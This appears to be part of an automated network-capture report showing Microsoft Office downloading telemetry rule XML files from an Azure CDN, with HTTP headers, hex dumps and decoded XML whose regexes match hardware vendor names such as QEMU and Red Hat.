                                                                                                                    x-azure-ref: 20241130T103528Z-174f7845968kvnqxhC1EWRmf3g0000000n60000000001z4p
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:28 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    96192.168.2.44984713.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:29 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:29 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:29 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 474
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                    ETag: "0x8DC582BB3F48DAE"
                                                                                                                    x-ms-request-id: a2105f9f-201e-00aa-1591-3f3928000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103529Z-174f7845968psccphC1EWRuz9s00000011gg000000006vrq
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:29 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    97192.168.2.44984013.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:29 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:30 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:29 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 468
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                    ETag: "0x8DC582BB3EAF226"
                                                                                                                    x-ms-request-id: 84052cd8-a01e-000d-592e-41d1ea000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103529Z-174f7845968cpnpfhC1EWR3afc00000010y0000000004mry
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:30 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    98192.168.2.44984813.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:30 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:30 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:30 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 408
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                    ETag: "0x8DC582BB9B6040B"
                                                                                                                    x-ms-request-id: 6b17fc2f-301e-006e-0e9b-40f018000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103530Z-174f7845968swgbqhC1EWRmnb400000011e0000000005mha
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:30 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    99192.168.2.44984913.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:30 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:30 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:30 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 469
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                    ETag: "0x8DC582BB3CAEBB8"
                                                                                                                    x-ms-request-id: 78ef61fc-d01e-0017-39f1-41b035000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103530Z-174f7845968qj8jrhC1EWRh41s0000001170000000005x7d
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:30 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    100192.168.2.44985013.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:30 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:31 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:31 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 416
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                    ETag: "0x8DC582BB5284CCE"
                                                                                                                    x-ms-request-id: f990aecf-801e-0035-05af-42752a000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103531Z-174f7845968cdxdrhC1EWRg0en00000011b0000000001uf4
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:31 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    101192.168.2.44985113.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:31 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:31 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:31 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 472
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                    ETag: "0x8DC582B91EAD002"
                                                                                                                    x-ms-request-id: 55122f27-801e-0083-61b2-42f0ae000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103531Z-174f7845968zgtf6hC1EWRqd8s0000000u900000000045vr
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:31 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    102192.168.2.44985213.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:31 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:32 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:32 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 432
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                    ETag: "0x8DC582BAABA2A10"
                                                                                                                    x-ms-request-id: b0631f7c-d01e-008e-21af-42387a000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103532Z-174f78459684db9fhC1EWRc7g400000001ag000000004fny
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:32 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    103192.168.2.44985313.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:32 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:32 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:32 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 475
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                    ETag: "0x8DC582BBA740822"
                                                                                                                    x-ms-request-id: 3d9c2adf-901e-00ac-7b91-3fb69e000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103532Z-174f78459685m244hC1EWRgp2c000000113g000000005wpe
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:32 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    104192.168.2.44985413.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:32 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:33 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:32 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 427
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                    ETag: "0x8DC582BB464F255"
                                                                                                                    x-ms-request-id: 4fa988ca-e01e-000c-2c91-3f8e36000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103532Z-174f7845968psccphC1EWRuz9s00000011h0000000005hzb
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:33 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    105192.168.2.44985513.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:33 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:33 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:33 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 474
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                    ETag: "0x8DC582BA4037B0D"
                                                                                                                    x-ms-request-id: 89e8b03d-001e-0065-5291-3f0b73000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103533Z-174f78459684bddphC1EWRbht400000010zg000000006vwr
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
